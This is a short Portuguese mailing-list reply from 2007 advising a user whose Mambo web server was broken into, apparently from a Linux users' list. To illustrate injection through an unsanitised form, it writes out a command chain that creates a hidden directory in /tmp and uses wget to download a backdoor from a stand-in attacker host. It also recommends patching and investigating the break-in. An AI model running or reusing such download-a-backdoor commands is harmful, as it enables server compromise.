Re: Fui invadido - não sei o que mais fazer...
Em 03/05/07, Daniel<da_picon@yahoo.com.br> escreveu:
Galera, me defrontei com um baita problema nessa volta de feriado...
Ontem, verificando meu servidor de web, vi que tinha um usuário novo no
bash.. aí fui ver os logs.. apagados.. resumindo: máquina invadida.
[...]
Bom, muitas coisas podem ter acontecido, e vou dar mais uma possibilidade:
em algum lugar que o mambo não projeta direito algum form e mande
direto o conteudo p/ uma query sql, o cara pode mandar assim:
busca por fulano de tal:
select * from users where nome=$variável
vira isso:
select 8 from users where nome="fulano de tal"; cd /tmp; mkdir .aa; cd
.aa; wget www.hakersz.ru/backdoor.gz; gunzip backdoor.gz ......
Ai basta vc estar usando qquer software desatualizado (kernel, em
especial) que o cara pode explorar e fazer a famosa escalada de
privilégio...
Ou seja, tem que fazer o update constantemente, de todos os softwares!
E essas coisas em PHP são sempre complicadas viu.... potencial de bugs
imenso.
Outra coisa: o ideal seria não sair formatando de cara.... seria legal
gastar um tempinho tentando descobrir o que é que aconteceu p/ que não
se repita.... mas nem sempre temos estrutura/tempo p/ fazer nossas
obrigações mais essas emergências que aparecem.
Veja tbm no histórico da lista, há várias outras dicas de casos
semelhantes ao seu.
Boa sorte.
--
Marcos
Reply to: